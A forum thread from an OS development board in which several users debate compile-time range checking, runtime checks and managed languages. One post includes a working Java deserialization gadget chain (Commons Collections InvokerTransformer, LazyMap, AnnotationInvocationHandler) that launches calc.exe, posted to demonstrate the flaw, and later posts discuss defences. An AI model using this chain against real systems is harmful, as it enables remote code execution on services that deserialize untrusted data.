Heh, I believe this is the source of both Schol-R-LEA's and my disagreement with your claim of "no runtime checks." Because that is a check performed at runtime, and it is required by the compiler, it's just inserted by the programmer instead. (I do prefer that method though, as with the right annotations in the language it allows the programmer to control exactly where the runtime checks happen.)Brendan wrote:If the programmer does happen to do something like "if(x >= x.max) { return FAILED; }" then this is no different to any branch in any language. It's not a run-time check inserted by the compiler itself.
Os and implementing good gpu drivers(nvidia)
Re: Os and implementing good gpu drivers(nvidia)
Re: Os and implementing good gpu drivers(nvidia)
Hi,
Are these branches normal flow control or are they run-time checks?
What if I wrote this:
And the compiler complained that "value - 1" may overflow (become negative); and I changed the code to this:
Did I add a run-time check or normal flow control?
If you think these are run-time checks (and not normal flow control); then all software has run-time checks and therefore all software managed. It's absurd.
Cheers,
Brendan
For this code:Rusky wrote:Heh, I believe this is the source of both Schol-R-LEA's and my disagreement with your claim of "no runtime checks." Because that is a check performed at runtime, and it is required by the compiler, it's just inserted by the programmer instead. (I do prefer that method though, as with the right annotations in the language it allows the programmer to control exactly where the runtime checks happen.)Brendan wrote:If the programmer does happen to do something like "if(x >= x.max) { return FAILED; }" then this is no different to any branch in any language. It's not a run-time check inserted by the compiler itself.
Code: Select all
value = 0;
while( (c = [buffer[i++]) != 0) {
if( (c >= '0') && (c <= '9') ) {
value = value * 16 + c - '0';
} else if( (c >= 'A') && (c <= 'F') ) {
value = value * 16 + c - 'A' + 10;
} else {
return -1;
}
}
return value;
What if I wrote this:
Code: Select all
unsigned long long factorial(unsigned char value) {
return value * factorial(value-1);
}
Code: Select all
unsigned long long factorial(unsigned char value) {
if(value <= 1) return 1;
return value * factorial(value-1);
}
If you think these are run-time checks (and not normal flow control); then all software has run-time checks and therefore all software managed. It's absurd.
Cheers,
Brendan
For all things; perfection is, and will always remain, impossible to achieve in practice. However; by striving for perfection we create things that are as perfect as practically possible. Let the pursuit of perfection be our guide.
Re: Os and implementing good gpu drivers(nvidia)
Yeah, it's obvious that there are conditionals that belong to the given algorithm and checks that only shield against programming errors like index out of bound.Did I add a run-time check or normal flow control?
If you think these are run-time checks (and not normal flow control); then all software has run-time checks and therefore all software managed. It's absurd.
The latter ones are auto generated in e.g. Java or D, and I'd also count the std::vector::at in C++.
Conflating those doesn't help the discussion, but of course a less proficient programmer could degrade any statically checked system by always just doing something like:
Code: Select all
array[x] // error cannot prove that x < array.length
// less proficient programmer changes this to
if(x > array.length)
throw IndexOutOfBounds()
array[x] // fine now
- Schol-R-LEA
- Member
- Posts: 1925
- Joined: Fri Oct 27, 2006 9:42 am
- Location: Athens, GA, USA
Re: Os and implementing good gpu drivers(nvidia)
OK, this gives me some idea of your intentions. From this, I gather your intent is that the compiler flag an error (or at least a warning) on invalid possibles. This seems reasonable to me, and I had much the same thing in mind (though only for builds with a version status of 'release-candidate' and above). It also tells me that you are differentiating from the compiler inserting runtime checks automatically, and the compiler requiring the programmer to include manually inserted runtime checks.Brendan wrote:For this case; the compiler would see "x = x + 1;" and evaluate the range of the result of the expression on the right hand side (if x ranges from 0 to 999 then x+1 must have a range from 1 to 1000). Then (for assignment) the compiler checks that the left hand side is able to store that range of values, and generates a compile time error because x can only store a value from 0 to 999.
The programmer would have to fix the error. This might mean doing "x = (x + 1) % (x.max + 1)" if they want wrapping, or doing "x = min(x+1, x.max);" if they want saturation, or adding a check immediately before it, or adding a check somewhere else entirely, or increasing the range of values that x can hold, or changing it to "x2 = x + 1;", or ....
If the programmer does happen to do something like "if(x >= x.max) { return FAILED; }" then this is no different to any branch in any language. It's not a run-time check inserted by the compiler itself.
This last part is of interest to me, as I am not sure I see them as being as clear-cut as you seem to be asserting. For example, it would seem (to me) that there is no reason this couldn't be automated, at least partially. For example, let us consider the possibility of allowing the client-programmer to define range types (either as named types or as one-off subtypes of the integer type) in which a specific behavior is defaulted:
Code: Select all
(def Foo-Range
(constrainted-type Integer
(cond (((< _ -250) (set! _ -250) _)
((>= _ 750) (raise-overflow-exception! _))
(else _)))))
(This is just off the top of my head, but sort of what I have in mind; I would probably have a specific ranged-type c'tor that would cover this common case:
Code: Select all
(def Foo-Range
(ranged-type Integer
:underflow #saturate
:overflow (raise-overflow-exception! _)))
Also, the premise of pre-analyzing all possible paths has the potential of running into a combinatorial explosion. At some point, the compiler would have to simply give up and reject the code, agreed? That may make certain kinds of code impossible to write with such restrictions in place. This is not a very likely scenario, so I don't know if it is worth giving too much weight to it, but it would have to addressed at least in the documentation and error reporting.
There's another case which would be problematic (well, in most languages, anyway - there are languages where it is possible to programmatically generate types at runtime, but the overhead is quite steep), which is where the range itself is set at runtime. There really would be no clear-cut way to check that ahead of time in a statically-typed language, so the compiler would in your scenario require every access to the value to be explicitly tested. Since this is precisely the scenario we are looking to avoid, it is hard to see how not testing automatically would be of benefit. Again, an unlikely scenario, but something to give consideration to.
I gather, you would consider explicit checks preferable in any of these scenarios, is this correct?
Schol-R-LEA wrote:Note that I have not given the context of this use case - neither whether it is part of a loop condition or simply some arbitrary part of the program logic, nor whether the increment or the range are explicitly defined in the program or not. Context may be relevant to your solution, I will grant, but I want to first consider the general case before moving on to specific cases.
I would say it can affect a good deal more than that. For example, if the value is the index of a definite loop, and the compiler detects that the body of the code had no effect, then the loop itself (including the increment) can be optimized away.Brendan wrote:The context only really effects what the compiler thinks the previous range of values in x could be.
OK, that's not really a fair example, but consider (as an example) a counting loop where the index is not explicitly used for any other purpose; depending on the processor, it may be possible to reverse the increment to a decrement in order to use a simpler exit condition, or replace the loop with with non-conditional repetition (e.g., REPZ MOV RSI, RDI). Whether it would be possible to find such potential optimizations (and know when they would make a difference) might not be feasible, but that's not the point: the point is that context can affect how you compile a particular part of a program.
Excellent, this gives us all a lot better understanding of your intentions and motivations, I think.Brendan wrote:Basically it comes down to a design choice. A compiler may:The first option is what I'm planning. It's harder to write the compiler and makes things a little more annoying for programmers when they write code.
- guarantee there are no false positives (e.g. overflows) at compile time; which makes it impossible to avoid false negatives (e.g. "nuisance" errors) at compile time, or
- guarantee there are no false negatives (e.g. "nuisance" errors) at compile time; which makes it impossible to avoid false positives (e.g. overflows) at compile time
Rev. First Speaker Schol-R-LEA;2 LCF ELF JAM POEE KoR KCO PPWMTF
Ordo OS Project
Lisp programmers tend to seem very odd to outsiders, just like anyone else who has had a religious experience they can't quite explain to others.
Ordo OS Project
Lisp programmers tend to seem very odd to outsiders, just like anyone else who has had a religious experience they can't quite explain to others.
Re: Os and implementing good gpu drivers(nvidia)
This is precisely my point- they are (or should be) the same thing. Like I said, "it allows the programmer to control exactly where the runtime checks happen," and that includes folding them into other control flow that may already be necessary.Brendan wrote:If you think these are run-time checks (and not normal flow control); then all software has run-time checks
Yes, concluding that everything is "managed" because it has non-compiler-enforced runtime checks often folded into regular control flow does sound an awful lot like something embryo would say.Brendan wrote:and therefore all software managed. It's absurd.
Re: Os and implementing good gpu drivers(nvidia)
Your insistence has made it. I finally downloaded the code from the Git and managed to run it in much simpler form (to understand it clearly).Octocontrabass wrote:How does $1000 USD sound? Please read the next section carefully before agreeing.
Yes. It works. I was wrong.
Here is the code. No trash from article author's classes needed. But to compile it the JDK is required instead of JRE. And commons collections, of course. There should be exception after the calc.exe is run, but it's not important for the problem.
Code: Select all
Transformer[] transformers = new Transformer[] {
new ConstantTransformer(Runtime.class),
new InvokerTransformer("getMethod", new Class[] { String.class, Class[].class }, new Object[] { "getRuntime", new Class[0] }),
new InvokerTransformer("invoke", new Class[] { Object.class, Object[].class }, new Object[] { null, new Object[0] }),
new InvokerTransformer("exec", new Class[] { String.class }, new String[]{"calc.exe"}),
new ConstantTransformer(1) };
Transformer transformerChain = new ChainedTransformer(transformers);
Map<?,?> lazyMap = LazyMap.decorate(new HashMap<Object,Object>(), transformerChain);
Constructor<?> c = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler").getDeclaredConstructors()[0];
c.setAccessible(true);
InvocationHandler ih1=(InvocationHandler)c.newInstance(Override.class, lazyMap);
Class<?>[] allIfaces = new Class[]{Map.class};
Map<?,?> mapProxy = Map.class.cast(Proxy.newProxyInstance(Map.class.getClassLoader(), allIfaces , ih1));
InvocationHandler ih=(InvocationHandler)c.newInstance(Override.class, mapProxy);
ObjectOutputStream oos=new ObjectOutputStream(new FileOutputStream("d:/temp/ser.bin"));
oos.writeObject(ih);
oos.close();
ObjectInputStream ois=new ObjectInputStream(new FileInputStream("d:/temp/ser.bin"));
Object after=ois.readObject();
ois.close();
So, just stop using serialized objects from untrusted sources.
My previous account (embryo) was accidentally deleted, so I have no chance but to use something new. But may be it was a good lesson about software reliability
Re: Os and implementing good gpu drivers(nvidia)
Or fix deserialization so you can use it for untrusted communication instead of other, more error-prone methods. Or isn't that what managed languages are supposed to do for you?embryo2 wrote:So, just stop using serialized objects from untrusted sources.
Re: Os and implementing good gpu drivers(nvidia)
Hi,
For creating integers it's like "range 0 to 255 myInteger", but (for convenience) the compiler also lets you specific a range by the number of bits (e.g. "s7" is a synonym for "range -64 to 63", and "u12" is a synonym for "range 0 to 4095").
For creating floating point variables it's similar but different because there's both precision and range. The precision is specified in bits and the range is like it is for integers - e.g. "f24 range 0 to 1 myFloaty". It's also possible to set the range by specifying the exponent size in bits, so "f24e8" is equivalent to a single precision (32-bit) float.
In general this has nothing to do with how much space variables consume and programmers shouldn't know or care about storage. For example if you have an integer "range 100000000 to 100000255 foo" then the compiler can store it in 8-bits or anything else it feels like.
For structures, the compiler is free to do anything it wants. For example, if you have this:
Then the compiler might use 8 bits for "foo"; then decide to pack "dayOfWeek", "day" and "month" into a bitfield; and then (for alignment purposes) re-order the fields so you end up with this:
Of course the language doesn't support bitfields, as there's no real reason to bother with them.
For cases where the exact layout in memory matters (e.g. for file formats and messaging protocols in normal process, and for things like page tables in kernels and memory mapped IO in device drivers) there's "rigid structures". For these the compiler has to follow a set of strict rules - no padding for alignment (other than rounding to the nearest whole byte), no field re-ordering, everything little-endian (even on big-endian machines), no tricks to reduce sizes (that "range 100000000 to 100000255 foo" variable would be 32 bits), etc.
A function's signature is a contract. If you write "range 1 to 9 myFunction(range -100 to 300 y)" then the compiler checks that the function is capable of handling all possible values of y from -100 to 300 correctly. If the function is called, the compiler only has to check that the caller complies with the contract (the caller provides a value from -100 to 300). This means that individual functions can be checked in isolation, and checked in any order (and checked in parallel, possibly by multiple computers on a LAN).
Also note that for local variables the overflow checking can work in reverse. Normally for assignments the compiler ensures that the left hand side variable can handle the range of results from the right hand expression and complains if it doesn't. However, if you say that a local variable has the "auto" type then the compiler initially assumes the variable's range is from 0 to 0, and instead of complaining if there's an overflow it just increases the variable's range.
Cheers,
Brendan
I don't just have ranged types, I only have ranged types.Schol-R-LEA wrote:OK, this gives me some idea of your intentions. From this, I gather your intent is that the compiler flag an error (or at least a warning) on invalid possibles. This seems reasonable to me, and I had much the same thing in mind (though only for builds with a version status of 'release-candidate' and above). It also tells me that you are differentiating from the compiler inserting runtime checks automatically, and the compiler requiring the programmer to include manually inserted runtime checks.Brendan wrote:For this case; the compiler would see "x = x + 1;" and evaluate the range of the result of the expression on the right hand side (if x ranges from 0 to 999 then x+1 must have a range from 1 to 1000). Then (for assignment) the compiler checks that the left hand side is able to store that range of values, and generates a compile time error because x can only store a value from 0 to 999.
The programmer would have to fix the error. This might mean doing "x = (x + 1) % (x.max + 1)" if they want wrapping, or doing "x = min(x+1, x.max);" if they want saturation, or adding a check immediately before it, or adding a check somewhere else entirely, or increasing the range of values that x can hold, or changing it to "x2 = x + 1;", or ....
If the programmer does happen to do something like "if(x >= x.max) { return FAILED; }" then this is no different to any branch in any language. It's not a run-time check inserted by the compiler itself.
This last part is of interest to me, as I am not sure I see them as being as clear-cut as you seem to be asserting. For example, it would seem (to me) that there is no reason this couldn't be automated, at least partially. For example, let us consider the possibility of allowing the client-programmer to define range types (either as named types or as one-off subtypes of the integer type) in which a specific behavior is defaulted:Code: Select all
(def Foo-Range (constrainted-type Integer (cond (((< _ -250) (set! _ -250) _) ((>= _ 750) (raise-overflow-exception! _)) (else _)))))
(This is just off the top of my head, but sort of what I have in mind; I would probably have a specific ranged-type c'tor that would cover this common case:or something like it.) Similar things could be done with ranged types in (for example) Ada, though IIRC in that case the default (and only) behavior is to raise a standard exception. Furthermore, using an explicit range could allow the compiler (or library macros, in my case) to automatically optimize the variable's memory footprint (by using a 16-bit value instead of 64-bit one, for example). Of course, range checking is just one example, but the point is, there are ways in which this can be automated which would still give the client-programmer fine control over the handling of edge cases.Code: Select all
(def Foo-Range (ranged-type Integer :underflow #saturate :overflow (raise-overflow-exception! _)))
For creating integers it's like "range 0 to 255 myInteger", but (for convenience) the compiler also lets you specific a range by the number of bits (e.g. "s7" is a synonym for "range -64 to 63", and "u12" is a synonym for "range 0 to 4095").
For creating floating point variables it's similar but different because there's both precision and range. The precision is specified in bits and the range is like it is for integers - e.g. "f24 range 0 to 1 myFloaty". It's also possible to set the range by specifying the exponent size in bits, so "f24e8" is equivalent to a single precision (32-bit) float.
In general this has nothing to do with how much space variables consume and programmers shouldn't know or care about storage. For example if you have an integer "range 100000000 to 100000255 foo" then the compiler can store it in 8-bits or anything else it feels like.
For structures, the compiler is free to do anything it wants. For example, if you have this:
Code: Select all
struct {
range 100000000 to 100000255 foo
u32 bar
range 1 to 7 dayOfWeek
range 1 to 31 day
range 1 to 12 month
}
Code: Select all
struct {
u32 bar
u16 dayOfMonth : 3
u16 day : 5
u16 month : 4
u8 foo
}
For cases where the exact layout in memory matters (e.g. for file formats and messaging protocols in normal process, and for things like page tables in kernels and memory mapped IO in device drivers) there's "rigid structures". For these the compiler has to follow a set of strict rules - no padding for alignment (other than rounding to the nearest whole byte), no field re-ordering, everything little-endian (even on big-endian machines), no tricks to reduce sizes (that "range 100000000 to 100000255 foo" variable would be 32 bits), etc.
NoSchol-R-LEA wrote:Also, the premise of pre-analyzing all possible paths has the potential of running into a combinatorial explosion. At some point, the compiler would have to simply give up and reject the code, agreed? That may make certain kinds of code impossible to write with such restrictions in place. This is not a very likely scenario, so I don't know if it is worth giving too much weight to it, but it would have to addressed at least in the documentation and error reporting.
A function's signature is a contract. If you write "range 1 to 9 myFunction(range -100 to 300 y)" then the compiler checks that the function is capable of handling all possible values of y from -100 to 300 correctly. If the function is called, the compiler only has to check that the caller complies with the contract (the caller provides a value from -100 to 300). This means that individual functions can be checked in isolation, and checked in any order (and checked in parallel, possibly by multiple computers on a LAN).
Also note that for local variables the overflow checking can work in reverse. Normally for assignments the compiler ensures that the left hand side variable can handle the range of results from the right hand expression and complains if it doesn't. However, if you say that a local variable has the "auto" type then the compiler initially assumes the variable's range is from 0 to 0, and instead of complaining if there's an overflow it just increases the variable's range.
You'd have to choose a "max. size" type and the compiler will only ensure that all your code handles the range of the max. size type correctly. Anything beyond that (e.g. if you want to limit values to a sub-range at run-time, or only want to store prime numbers, or only odd numbers, or whatever else) is "domain logic" (your problem) and not "correctness" (compiler's problem).Schol-R-LEA wrote:There's another case which would be problematic (well, in most languages, anyway - there are languages where it is possible to programmatically generate types at runtime, but the overhead is quite steep), which is where the range itself is set at runtime. There really would be no clear-cut way to check that ahead of time in a statically-typed language, so the compiler would in your scenario require every access to the value to be explicitly tested. Since this is precisely the scenario we are looking to avoid, it is hard to see how not testing automatically would be of benefit. Again, an unlikely scenario, but something to give consideration to.
I gather, you would consider explicit checks preferable in any of these scenarios, is this correct?
Things like syntax checks, grammar/semantic checks, type checks, and overflow and precision checks happen first. Optimisations only happen after checks are done.Schol-R-LEA wrote:I would say it can affect a good deal more than that. For example, if the value is the index of a definite loop, and the compiler detects that the body of the code had no effect, then the loop itself (including the increment) can be optimized away.Brendan wrote:The context only really effects what the compiler thinks the previous range of values in x could be.Schol-R-LEA wrote:Note that I have not given the context of this use case - neither whether it is part of a loop condition or simply some arbitrary part of the program logic, nor whether the increment or the range are explicitly defined in the program or not. Context may be relevant to your solution, I will grant, but I want to first consider the general case before moving on to specific cases.
OK, that's not really a fair example, but consider (as an example) a counting loop where the index is not explicitly used for any other purpose; depending on the processor, it may be possible to reverse the increment to a decrement in order to use a simpler exit condition, or replace the loop with with non-conditional repetition (e.g., REPZ MOV RSI, RDI). Whether it would be possible to find such potential optimizations (and know when they would make a difference) might not be feasible, but that's not the point: the point is that context can affect how you compile a particular part of a program.
For this aspect of it, yes.Schol-R-LEA wrote:Excellent, this gives us all a lot better understanding of your intentions and motivations, I think.Brendan wrote:Basically it comes down to a design choice. A compiler may:The first option is what I'm planning. It's harder to write the compiler and makes things a little more annoying for programmers when they write code.
- guarantee there are no false positives (e.g. overflows) at compile time; which makes it impossible to avoid false negatives (e.g. "nuisance" errors) at compile time, or
- guarantee there are no false negatives (e.g. "nuisance" errors) at compile time; which makes it impossible to avoid false positives (e.g. overflows) at compile time
Cheers,
Brendan
For all things; perfection is, and will always remain, impossible to achieve in practice. However; by striving for perfection we create things that are as perfect as practically possible. Let the pursuit of perfection be our guide.
Re: Os and implementing good gpu drivers(nvidia)
Why do you think untrusted communication is better than other methods?Rusky wrote:Or fix deserialization so you can use it for untrusted communication instead of other, more error-prone methods.
More security? Yes. Can developers of managed environments make security related bugs? Yes. But with unmanaged approach the security is compromised even more. If a program runs unbound then there's no way to change anything. And it is still impossible to guarantee program's safeness before it hit it's users.Rusky wrote:Or isn't that what managed languages are supposed to do for you?
My previous account (embryo) was accidentally deleted, so I have no chance but to use something new. But may be it was a good lesson about software reliability
- Combuster
- Member
- Posts: 9301
- Joined: Wed Oct 18, 2006 3:45 am
- Libera.chat IRC: [com]buster
- Location: On the balcony, where I can actually keep 1½m distance
- Contact:
Re: Os and implementing good gpu drivers(nvidia)
Requiring authentication only lowers the amount of privileges escalated. If you get hold of an account that can't normally do much, you can still exploit this for full administrator privileges.Rusky wrote:Or fix deserialization so you can use it for untrusted communication instead of other, more error-prone methods. Or isn't that what managed languages are supposed to do for you?embryo2 wrote:So, just stop using serialized objects from untrusted sources.
I don't consider authentication a fix. After all, chances is there's some employee who neglected to change his password from "hello", or there's a simple sign-up form that gives you "zero" privileges.
- Schol-R-LEA
- Member
- Posts: 1925
- Joined: Fri Oct 27, 2006 9:42 am
- Location: Athens, GA, USA
Re: Os and implementing good gpu drivers(nvidia)
While I agree that it isn't a fix, some sort of authentication or vetting will probably have to be part of any 'solution' that comes up, at least in the immediate term, and it does at least raise the barrier to attack a small amount. Whether it raises it sufficiently to justify the added complexity, and how much said complexity itself changes the window of vulnerability, is something that would have to be determined as specific approaches get proposed and disposed. Security is a treatment, not a remedy.Combuster wrote:Requiring authentication only lowers the amount of privileges escalated. If you get hold of an account that can't normally do much, you can still exploit this for full administrator privileges.Rusky wrote:Or fix deserialization so you can use it for untrusted communication instead of other, more error-prone methods. Or isn't that what managed languages are supposed to do for you?embryo2 wrote:So, just stop using serialized objects from untrusted sources.
I don't consider authentication a fix. After all, chances is there's some employee who neglected to change his password from "hello", or there's a simple sign-up form that gives you "zero" privileges.
What is really needed, though, are better mechanisms for continuous review of existing security resolutions, preferably one that is reflective enough that exploits of the review itself would be significantly difficult. Of course, you would need to change that procedure itself over time to make sure no new unforeseen exploits arise. Security is a process, etc.
Rev. First Speaker Schol-R-LEA;2 LCF ELF JAM POEE KoR KCO PPWMTF
Ordo OS Project
Lisp programmers tend to seem very odd to outsiders, just like anyone else who has had a religious experience they can't quite explain to others.
Ordo OS Project
Lisp programmers tend to seem very odd to outsiders, just like anyone else who has had a religious experience they can't quite explain to others.
Re: Os and implementing good gpu drivers(nvidia)
Not sure who you were replying to, but by "fix deserialization" I mean something more like restricting it to a whitelist of classes, or restricting it to plain old data types if that's an option in the language. You should be able to easily read data from the network without worrying about it executing arbitrary code or allocating too much memory or hanging your program.
Re: Os and implementing good gpu drivers(nvidia)
It's called validation. In case of a password there's also some kind of validation involved. So, the trusted source is the source of validated data.Rusky wrote:Not sure who you were replying to, but by "fix deserialization" I mean something more like restricting it to a whitelist of classes, or restricting it to plain old data types if that's an option in the language. You should be able to easily read data from the network without worrying about it executing arbitrary code or allocating too much memory or hanging your program.
By the way, there are a lot of XML parsers used without serious validation. So, in any language it is possible to invoke something on the server side if the parser is eager to invoke something data driven.
My previous account (embryo) was accidentally deleted, so I have no chance but to use something new. But may be it was a good lesson about software reliability
- Combuster
- Member
- Posts: 9301
- Joined: Wed Oct 18, 2006 3:45 am
- Libera.chat IRC: [com]buster
- Location: On the balcony, where I can actually keep 1½m distance
- Contact:
Re: Os and implementing good gpu drivers(nvidia)
I'd vote to ban deserialisation side-effects altogether. If you do need them it's easy to call a method on the root deserialised object and propagate from there.Rusky wrote:Not sure who you were replying to, but by "fix deserialization" I mean something more like restricting it to a whitelist of classes, or restricting it to plain old data types if that's an option in the language. You should be able to easily read data from the network without worrying about it executing arbitrary code or allocating too much memory or hanging your program.
Re: Os and implementing good gpu drivers(nvidia)
It's not easy. The root is not responsible for the flaw in case of the hack being discussed. The way it works is complex. There actually the LazyMap class that connects fields with actions. And it is invoked during the very specific action of annotation deserialization. And the annotation is not the root class. And all the transformers from commons collections are not guilty. It's the LazyMap.Combuster wrote:I'd vote to ban deserialisation side-effects altogether. If you do need them it's easy to call a method on the root deserialised object and propagate from there.
Because of such complexity there's just no way except the very thorough validation. In case of XML, JSON or even HTTP or RMI or whatever, there also are some deserializers. What if some of them invoke something like LazyMap in the process? Validation allows to limit the incoming threat, else we need to review all the parsing related code in every language.
My previous account (embryo) was accidentally deleted, so I have no chance but to use something new. But may be it was a good lesson about software reliability